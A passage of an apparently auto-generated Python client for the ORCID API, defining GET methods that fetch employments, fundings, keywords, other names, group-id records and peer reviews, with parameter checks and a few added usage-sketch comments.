raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_employments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_employments`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employments'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Employments',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_external_identifier(self, orcid, put_code, **kwargs):
"""
Fetch external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifier(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_external_identifier_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_external_identifier_with_http_info(orcid, put_code, **kwargs)
return data
def view_external_identifier_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifier_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_external_identifier" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_external_identifier`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_external_identifier`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_external_identifiers(self, orcid, **kwargs):
"""
Fetch external identifiers
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifiers(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_external_identifiers_with_http_info(orcid, **kwargs)
else:
data = self.view_external_identifiers_with_http_info(orcid, **kwargs)
return data
def view_external_identifiers_with_http_info(self, orcid, **kwargs):
"""
Fetch external identifiers
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifiers_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_external_identifiers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_external_identifiers`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_funding(self, orcid, put_code, **kwargs):
"""
Fetch a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Funding
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_funding_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_funding_with_http_info(orcid, put_code, **kwargs)
return data
def view_funding_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Funding
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_funding" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_funding`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_funding`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Funding',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
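# Usage sketch (illustrative): the underscore-prefixed kwargs tune
# transport behaviour. In swagger-generated clients, _request_timeout is
# typically a total-seconds number or a (connect, read) tuple, and
# _preload_content=False skips deserialisation and returns the raw HTTP
# response object. `api` is assumed to be an instance of this class.
# >>> raw = api.view_funding('0000-0002-1825-0097', '4321',
# ...                        _preload_content=False,
# ...                        _request_timeout=(3.0, 10.0))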
def view_funding_summary(self, orcid, put_code, **kwargs):
"""
Fetch a Funding Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: FundingSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_funding_summary_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_funding_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_funding_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Funding Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_funding_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: FundingSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_funding_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_funding_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_funding_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FundingSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_fundings(self, orcid, **kwargs):
"""
Fetch all fundings
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_fundings(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Fundings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_fundings_with_http_info(orcid, **kwargs)
else:
data = self.view_fundings_with_http_info(orcid, **kwargs)
return data
def view_fundings_with_http_info(self, orcid, **kwargs):
"""
Fetch all fundings
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_fundings_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Fundings
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_fundings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_fundings`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/fundings'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Fundings',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_group_id_record(self, put_code, **kwargs):
"""
Fetch a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_record(put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: GroupIdRecord
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_group_id_record_with_http_info(put_code, **kwargs)
else:
data = self.view_group_id_record_with_http_info(put_code, **kwargs)
return data
def view_group_id_record_with_http_info(self, put_code, **kwargs):
"""
Fetch a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_record_with_http_info(put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: GroupIdRecord
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_group_id_record" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_group_id_record`")
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupIdRecord',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
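# Usage sketch: fetching one group-id record by put-code. Note that the
# snake_case `put_code` argument is mapped onto the camelCase `{putCode}`
# path segment above; the value shown is illustrative.
#
#     record = api.view_group_id_record('12345')   # -> GroupIdRecord
#     print(record)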
def view_group_id_records(self, **kwargs):
"""
Fetch Groups
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_records(callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str page_size:
:param str page:
:param str name:
:return: GroupIdRecords
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_group_id_records_with_http_info(**kwargs)
else:
data = self.view_group_id_records_with_http_info(**kwargs)
return data
def view_group_id_records_with_http_info(self, **kwargs):
"""
Fetch Groups
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_group_id_records_with_http_info(callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str page_size:
:param str page:
:param str name:
:return: GroupIdRecords
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_group_id_records" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['page-size'] = params['page_size']
if 'page' in params:
query_params['page'] = params['page']
if 'name' in params:
query_params['name'] = params['name']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupIdRecords',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
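# Usage sketch: paging through group-id records. The optional `page_size`,
# `page`, and `name` keywords are serialized as the `page-size`, `page`, and
# `name` query parameters built above; the values here are illustrative.
#
#     records = api.view_group_id_records(page_size='50', page='1', name='issn')
#     print(records)   # -> GroupIdRecords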
def view_keyword(self, orcid, put_code, **kwargs):
"""
Fetch keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keyword(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_keyword_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_keyword_with_http_info(orcid, put_code, **kwargs)
return data
def view_keyword_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keyword_with_http_info(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_keyword" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_keyword`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_keyword`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
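# Usage sketch: view_keyword is generated with response_type=None, so the
# deserialized result is empty. Under the usual swagger-codegen ApiClient
# contract (an assumption about code outside this module), disabling
# preloading yields the raw response object instead:
#
#     raw, status, headers = api.view_keyword_with_http_info(
#         orcid, put_code, _preload_content=False)
#     print(status, raw.data)   # raw body bytes; `.data` assumed from urllib3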
def view_keywords(self, orcid, **kwargs):
"""
Fetch keywords
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keywords(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_keywords_with_http_info(orcid, **kwargs)
else:
data = self.view_keywords_with_http_info(orcid, **kwargs)
return data
def view_keywords_with_http_info(self, orcid, **kwargs):
"""
Fetch keywords
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_keywords_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_keywords" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_keywords`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_other_name(self, orcid, put_code, **kwargs):
"""
Fetch Other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_name(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_other_name_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_other_name_with_http_info(orcid, put_code, **kwargs)
return data
def view_other_name_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch Other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_name_with_http_info(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_other_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_other_name`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_other_name`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_other_names(self, orcid, **kwargs):
"""
Fetch Other names
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_names(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_other_names_with_http_info(orcid, **kwargs)
else:
data = self.view_other_names_with_http_info(orcid, **kwargs)
return data
def view_other_names_with_http_info(self, orcid, **kwargs):
"""
Fetch Other names
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_other_names_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_other_names" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_other_names`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_peer_review(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReview
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_peer_review_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_peer_review_with_http_info(orcid, put_code, **kwargs)
return data
def view_peer_review_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review_with_http_info(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReview
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_peer_review" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
